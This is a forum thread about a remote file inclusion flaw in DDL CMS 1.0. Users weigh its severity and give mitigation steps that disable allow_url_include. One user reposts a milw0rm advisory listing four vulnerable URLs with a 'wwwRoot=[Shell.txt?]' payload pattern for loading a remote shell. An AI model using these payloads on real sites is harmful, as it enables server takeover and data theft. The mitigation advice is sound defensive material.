Latest Announcemnent
New thread
Status
Not open for further replies.
16 comments
Can you even confirm someone has found an exploit in the script and isn't just exploiting poorly secured sites (server config or whatever)? Well either way, I doubt any of us will go trough every line of code to find out.
 
Two things,

There is probably always an exploit in some code, and that's one of them. DDL CMS I think has it patched in an upcoming release which is apparently right around the corner.

Second all this does is allow somebody to download your SQL database...which quite frankly I could careless about. Good luck trying to hack anything from that database, and besides most sites using this will have just a big warez database of files which you can upload to your site lol.

Anyhow good that it's being fixed.
 
Actually Switchblade if the user downloads your database and the mysql server allows remote connections a user can simply logon to your database and if it is a forum can grant them admin rights and therefore can add multiple stuff to the forums keylogging accounts or more
 
this shouldn't be a problem, most hosts by default turn allow_url_include off since its unsafe.

to check just use a phpinfo.php file. Open a text editor and place the following codes..

Code: 
<?php 
phpinfo(); 
?>

save it as phpinfo.php then upload it to your webserver and run it in your browser like http://yourdomain.com/phpinfo.php

Under PHP Core, you should find the allow_url_include and local value should be turned off.

If it's on, then you need to disable it in php.ini and also in your htaccess.

You can find php.ini under /usr/local/lib

add/edit this line in your php.ini

Code: 
allow_url_include = Off

also need to add the following line in your htaccess

Code: 
php_flag allow_url_include 0
 
Here is the exploit, it was posted on milw0rm on the 21st of this month.

Code: 
+============================================================+
|                                                            |
| DDL CMS 1.0 Multiple Remote File Inclusion Vulnerabilities |
|                                                            |
+============================================================+
|                                                            |
| Author : HxH                                               |
|                                                            |
| E-Mail : HxH[at]live[dot]at                                |
|                                                            |
+------------------------------------------------------------+
|                                                            |
| Script : http://www.ddlcms.com/DDLCMS_v1.0.zip             |
|                                                            |
+------------------------------------------------------------+
|                                                            |
| Exploit :                                                  |
|                                                            |
| /header.php?wwwRoot=[Shell.txt?]                           |
|                                                            |
| /submit.php?wwwRoot=[Shell.txt?]                           |
|                                                            |
| /submitted.php?wwwRoot=[Shell.txt?]                        |
|                                                            |
| /autosubmitter/index.php?wwwRoot=[Shell.txt?]              |
|                                                            |
+============================================================+
|                                                            |
| Greetz : ~ JiKo ~ ThE X ~ TSH ~ All No-Exploit.com Members |
|                                                            |
+============================================================+
Code: 
http://www.milw0rm.com/exploits/9722
29zns4.gif
 
Status
Not open for further replies.
Back
Top